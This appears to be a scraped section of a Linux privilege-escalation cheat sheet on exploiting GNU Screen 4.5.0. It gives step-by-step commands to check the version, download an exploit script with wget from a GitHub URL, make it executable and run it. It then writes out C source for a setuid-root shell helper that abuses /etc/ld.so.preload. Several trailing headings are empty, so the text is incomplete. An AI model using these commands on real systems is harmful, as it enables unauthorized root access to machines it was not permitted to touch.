11.Vulnerable-services
Check screen version
screen -vDownload the exploit script (if you don't have it)
wget https://raw.githubusercontent.com/infernusinvictus/linux-exploit-suggestions/master/screen-4.5.0/screen_exploit.sh # or the location of your exploit.Make the script executable
chmod +x screen_exploit.shRun the exploit (replace ~ with the target user's home directory)
./screen_exploit.sh ~ gnu/screenroot ~If the script doesn't work directly, try the commands manually:
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOFCleanup (always a good idea)
Vulnerability:
Exploitation Steps (as shown in the script):
Key Points and Considerations:
Last updated